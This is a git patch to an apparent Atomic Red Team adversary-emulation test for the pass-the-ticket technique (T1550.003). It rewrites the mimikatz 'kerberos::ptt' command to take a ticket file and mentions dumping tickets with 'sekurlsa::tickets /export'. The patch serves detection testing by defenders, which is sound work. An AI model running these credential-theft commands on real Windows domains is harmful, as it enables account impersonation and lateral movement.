From 5b360eb7440dd799acbd883c370f81852172cb6f Mon Sep 17 00:00:00 2001 From: hackeT <40039738+Tatsuya-hasegawa@users.noreply.github.com> Date: Thu, 9 Dec 2021 01:56:45 +0900 Subject: [PATCH] T1550.003 pass the ticket by mimikatz patch (#1682) * Update T1550.003.md To avoid mimikatz failure and more useful argument description * Update T1550.003.yaml To avoid to fail mimikatz kerberos::ptt and be more easier to understand about argument. * Update T1550.003.yaml * Update T1550.003.md * Update T1550.003.md * Update T1550.003.yaml --- atomics/T1550.003/T1550.003.md | 5 ++--- atomics/T1550.003/T1550.003.yaml | 12 ++++-------- 2 files changed, 6 insertions(+), 11 deletions(-) diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md index d39b6ddf..58f8698b 100644 --- a/atomics/T1550.003/T1550.003.md +++ b/atomics/T1550.003/T1550.003.md @@ -32,8 +32,7 @@ Similar to PTH, but attacking Kerberos #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| user_name | username | String | Administrator| -| domain | domain | String | atomic.local| +| ticket | Ticket file name usually format of 'id-username\@domain\.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) | String | | | mimikatz_exe | Path of the Mimikatz binary | Path | PathToAtomicsFolder\T1550.003\bin\mimikatz.exe| @@ -41,7 +40,7 @@ Similar to PTH, but attacking Kerberos ```cmd -#{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain} +#{mimikatz_exe} "kerberos::ptt #{ticket}" ``` diff --git a/atomics/T1550.003/T1550.003.yaml b/atomics/T1550.003/T1550.003.yaml index 518b5a09..147cdd63 100644 --- a/atomics/T1550.003/T1550.003.yaml +++ b/atomics/T1550.003/T1550.003.yaml @@ -8,14 +8,10 @@ atomic_tests: supported_platforms: - windows input_arguments: - user_name: - description: username + ticket: + description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: Administrator - domain: - description: domain - type: String - default: atomic.local + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -35,5 +31,5 @@ atomic_tests: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force executor: command: | - #{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain} + #{mimikatz_exe} "kerberos::ptt #{ticket}" name: command_prompt